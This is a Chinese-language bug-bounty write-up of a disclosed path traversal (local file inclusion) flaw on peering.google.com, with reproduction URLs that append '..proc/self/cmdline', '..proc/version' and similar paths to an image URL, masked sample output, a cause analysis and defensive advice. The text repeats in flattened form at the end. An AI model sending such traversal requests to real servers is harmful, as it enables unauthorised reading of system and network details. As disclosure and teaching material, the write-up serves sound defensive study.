挖洞经验 | 谷歌peering.google.com中的本地文件包含(LFI)漏洞
字数 935 2025-08-18 11:38:56

谷歌peering.google.com本地文件包含(LFI)漏洞分析报告

漏洞概述

本地文件包含(LFI)漏洞存在于谷歌的peering.google.com域名下,该网站属于Google Edge network(谷歌分布式服务器网络)。通过精心构造的URL,攻击者可以读取服务器上的敏感系统文件,获取服务器配置、运行状态等关键信息。

漏洞危害

  • 信息泄露:可获取服务器配置文件、系统版本、进程信息等
  • 辅助渗透:为后续攻击提供有价值的信息
  • 潜在DoS攻击辅助:通过获取系统资源使用情况评估攻击可行性
  • 漏洞奖励:谷歌为此漏洞支付了$3133的奖金

漏洞复现步骤

  1. 访问目标网站上的任意图片资源,例如:

    https://peering.google.com/static/images/couch-ipad.png
    
  2. 在图片URL后追加本地文件路径,构造恶意URL:

    https://peering.google.com/static/images/couch-ipad.png..proc/self/cmdline
    

可利用的敏感文件路径

系统信息获取

  • ..proc/version - 获取Linux内核版本信息

    Linux version 3.*.* #1 SMP
    
  • ..proc/self/cmdline - 获取服务器软件信息

    server_software=Google App Engine/1.*.*
    

网络配置信息

  • ..proc/self/net/ - 获取内网IP地址信息
    apihost_address=169.*.*.253:*
    server_address=169.*.*.2:*
    

运行环境信息

  • ..proc/self/stat - 获取运行环境信息
    (python27g_runti)
    

系统资源信息

  • ..proc/self/status - 获取进程和系统资源使用情况
    FDSize: 11, VmSize: 1134532 kB, VmRSS: 134860 kB, Threads: 17
    

漏洞利用示例

  1. 获取服务器软件版本:

    https://peering.google.com/static/images/couch-ipad.png..proc/self/cmdline
    
  2. 获取内核版本:

    https://peering.google.com/static/images/couch-ipad.png..proc/version
    
  3. 获取网络配置:

    https://peering.google.com/static/images/couch-ipad.png..proc/self/net/
    

漏洞原理分析

该漏洞属于典型的路径遍历漏洞,由于服务器未对用户输入进行充分过滤,导致攻击者可以通过..目录遍历符号访问系统敏感文件。特别是当服务器配置为允许动态文件包含时,这种漏洞的危害性更大。

防御措施

  1. 输入验证:

    • 严格过滤用户输入中的../等特殊字符
    • 使用白名单机制限制可访问的文件路径
  2. 服务器配置:

    • 禁用不必要的动态文件包含功能
    • 设置适当的文件系统权限,限制Web用户权限
  3. 安全开发:

    • 避免直接使用用户输入作为文件路径
    • 使用安全的API进行文件操作
  4. 监控与日志:

    • 监控异常的文件访问行为
    • 记录详细的访问日志以便审计

总结

该案例展示了即使是像谷歌这样的技术巨头也可能存在简单的路径遍历漏洞。通过精心构造的URL,攻击者可以获取大量敏感系统信息,为后续攻击提供便利。开发人员应重视基础安全防护,对所有用户输入进行严格验证和过滤。

谷歌peering.google.com本地文件包含(LFI)漏洞分析报告 漏洞概述 本地文件包含(LFI)漏洞存在于谷歌的 peering.google.com 域名下,该网站属于Google Edge network(谷歌分布式服务器网络)。通过精心构造的URL,攻击者可以读取服务器上的敏感系统文件,获取服务器配置、运行状态等关键信息。 漏洞危害 信息泄露:可获取服务器配置文件、系统版本、进程信息等 辅助渗透:为后续攻击提供有价值的信息 潜在DoS攻击辅助:通过获取系统资源使用情况评估攻击可行性 漏洞奖励:谷歌为此漏洞支付了$3133的奖金 漏洞复现步骤 访问目标网站上的任意图片资源,例如: 在图片URL后追加本地文件路径,构造恶意URL: 可利用的敏感文件路径 系统信息获取 ..proc/version - 获取Linux内核版本信息 ..proc/self/cmdline - 获取服务器软件信息 网络配置信息 ..proc/self/net/ - 获取内网IP地址信息 运行环境信息 ..proc/self/stat - 获取运行环境信息 系统资源信息 ..proc/self/status - 获取进程和系统资源使用情况 漏洞利用示例 获取服务器软件版本: 获取内核版本: 获取网络配置: 漏洞原理分析 该漏洞属于典型的路径遍历漏洞,由于服务器未对用户输入进行充分过滤,导致攻击者可以通过 .. 目录遍历符号访问系统敏感文件。特别是当服务器配置为允许动态文件包含时,这种漏洞的危害性更大。 防御措施 输入验证: 严格过滤用户输入中的 .. 、 / 等特殊字符 使用白名单机制限制可访问的文件路径 服务器配置: 禁用不必要的动态文件包含功能 设置适当的文件系统权限,限制Web用户权限 安全开发: 避免直接使用用户输入作为文件路径 使用安全的API进行文件操作 监控与日志: 监控异常的文件访问行为 记录详细的访问日志以便审计 总结 该案例展示了即使是像谷歌这样的技术巨头也可能存在简单的路径遍历漏洞。通过精心构造的URL,攻击者可以获取大量敏感系统信息,为后续攻击提供便利。开发人员应重视基础安全防护,对所有用户输入进行严格验证和过滤。